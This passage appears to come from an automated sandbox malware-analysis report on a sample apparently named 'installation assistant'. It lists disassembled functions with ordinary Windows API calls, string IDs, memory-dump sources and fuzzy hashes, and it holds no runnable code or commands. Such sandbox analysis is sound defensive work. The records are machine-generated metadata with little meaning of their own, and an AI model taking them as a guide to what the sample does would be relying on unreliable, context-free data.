                                                          • GetLastError.KERNEL32(?,6C6ABD93,6C6B5AB6,6C6AB0D0,?,6C6B46EC,?,00000000,00000000,6C6B5AB6,00000000,00000000,?,00000000,6C6AB0D0,6C6B46EC), ref: 6C6AC385
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: Dt*%
                                                          • API String ID: 442123175-1118161045
                                                          • Opcode ID: db78667170edb988701d25b7b0bf91ef4ef629999985aee751249e981cee4e79
                                                          • Instruction ID: 11bb3447bf39695301ec950cd4086e29aa8ac214f45521d0402d9d5932211180
                                                          • Opcode Fuzzy Hash: db78667170edb988701d25b7b0bf91ef4ef629999985aee751249e981cee4e79
                                                          • Instruction Fuzzy Hash: AD21EF30A00219ABCF15DF69C8809EDB7F9FB49309F1441AAEA46D7210D731DE46CBA5
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID: dUyl$hUyl
                                                          • API String ID: 269201875-3873126082
                                                          • Opcode ID: 38bc701473ab3a383cf6f008fd3a62daaa5e8ab7bdc414ae27425c440014592e
                                                          • Instruction ID: 566591a9f035566649d5c3e5e04e64e1af5a29bae42e6e6afe76e6758eee9bb9
                                                          • Opcode Fuzzy Hash: 38bc701473ab3a383cf6f008fd3a62daaa5e8ab7bdc414ae27425c440014592e
                                                          • Instruction Fuzzy Hash: 1111E9711057829FE3148FA9D480B82B7E4EB0A35CB20552FE49DC7B61EB71ED468B9C
                                                          APIs
                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6C698BCD
                                                          • ___raise_securityfailure.LIBCMT ref: 6C698CB5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: FeaturePresentProcessor___raise_securityfailure
                                                          • String ID: Dt*%
                                                          • API String ID: 3761405300-1118161045
                                                          • Opcode ID: 7ffc30983f3e1451f542b96fb84900f403e389a6528b56d7f1c1f4c510d0d1fa
                                                          • Instruction ID: c89ca98bf1f2400b4c5998b724a562e04200b205a3d95ffde3a8c4633ae1b5ec
                                                          • Opcode Fuzzy Hash: 7ffc30983f3e1451f542b96fb84900f403e389a6528b56d7f1c1f4c510d0d1fa
                                                          • Instruction Fuzzy Hash: 7921B0B97002019BDF14DF59E556B517BF4BB4B318F1180BAF5289B790E3B05982EF48
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: @$LuJ
                                                          • API String ID: 3519838083-205571748
                                                          • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                                          • Instruction ID: 4eb5f2afef2d3dea792816c9eccea2dce3f487a0c5814cc2d1a64803343cab42
                                                          • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                                          • Instruction Fuzzy Hash: 9E01C0B2E01349DADB10DFA989809AEFBF4FF59314F40842EE469E3A40C3745A04CB99
                                                          APIs
                                                          • _free.LIBCMT ref: 6C6ADD49
                                                          • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6C6AA63A,?,00000004,?,4B42FCB6,?,?,6C69F78C,4B42FCB6,?), ref: 6C6ADD85
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: AllocHeap_free
                                                          • String ID: 8Q
                                                          • API String ID: 1080816511-4022487301
                                                          • Opcode ID: 60b486656811757bb57eb3cd49f9b09ebb79e8a8d5d1f37df91d8c01e52a03ad
                                                          • Instruction ID: 9166ee86d3d8eb868d9a8f85d552c4d1232658196b64b73d08f7de5ef1fe77a0
                                                          • Opcode Fuzzy Hash: 60b486656811757bb57eb3cd49f9b09ebb79e8a8d5d1f37df91d8c01e52a03ad
                                                          • Instruction Fuzzy Hash: 86F0C232251215669B212AA6AC44BAE37E89F83778B210225EC149BE90DF60CC03C2ED
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: p/K$J
                                                          • API String ID: 3519838083-2069324279
                                                          • Opcode ID: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                                                          • Instruction ID: edaa1457285e46603665a53a477c3f03001abaa6e19e3df6530770124cdd8960
                                                          • Opcode Fuzzy Hash: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                                                          • Instruction Fuzzy Hash: 8D019AB1A117119FD724CF59D6087AAB7F4EB55729F10C81EE096A3B40C7F8A5088BA8
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C70AFCC
                                                            • Part of subcall function 6C70A4D1: __EH_prolog.LIBCMT ref: 6C70A4D6
                                                            • Part of subcall function 6C70914B: __EH_prolog.LIBCMT ref: 6C709150
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: J$0J
                                                          • API String ID: 3519838083-2882003284
                                                          • Opcode ID: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                                                          • Instruction ID: f2d1ac9d5890a64f15d45e9b7e2a8b2a508f196e98b677ac5d74812e677f42f4
                                                          • Opcode Fuzzy Hash: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                                                          • Instruction Fuzzy Hash: 8A0105B1904B50CFC325CF5AC5A82CAFBE0BB15304F90C95EC0A657B50D7B8A508CB68
                                                          APIs
                                                          • AcquireSRWLockExclusive.KERNEL32(6C79466C,?,?,652EF5AA,6C5622D8,6C79430C), ref: 6C696AB9
                                                          • ReleaseSRWLockExclusive.KERNEL32(6C79466C), ref: 6C696AF3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ExclusiveLock$AcquireRelease
                                                          • String ID: lFyl
                                                          • API String ID: 17069307-2656733465
                                                          • Opcode ID: 9752021a83a95fcf6845f3be1997f8c172097eaae598e6a67e45b756cb9ff2c2
                                                          • Instruction ID: 804c2401bdafce894b60c702f8f4c0bcd4208c4186ed52f6a70da3c822016f15
                                                          • Opcode Fuzzy Hash: 9752021a83a95fcf6845f3be1997f8c172097eaae598e6a67e45b756cb9ff2c2
                                                          • Instruction Fuzzy Hash: 36F0A774240602DBCB10AF55D444A75F7B4FB47335F15422EE86583B90D7749843DAA9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: D)K$H)K$P)K$T)K
                                                          • API String ID: 0-2262112463
                                                          • Opcode ID: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                                                          • Instruction ID: af3c803d6f0f5345b3491804931973d61b568ec3047ee2cd4db57461e98700b7
                                                          • Opcode Fuzzy Hash: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                                                          • Instruction Fuzzy Hash: 9F510230A08209DBCF11CFA0DA40ADEB7B1EF4631CF14442AE85167A80DB79A948DB5E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (?K$8?K$H?K$CK
                                                          • API String ID: 0-3450752836
                                                          • Opcode ID: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                                                          • Instruction ID: 94c2f218cc6da6962cb6a918715da0c920bec6fe92bc199d476a0dc6eff69c26
                                                          • Opcode Fuzzy Hash: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                                                          • Instruction Fuzzy Hash: 17F030B05017009FC320CF06D54869BF7F4EB41709F50C91EE49A9BA40D3B8A5088FA8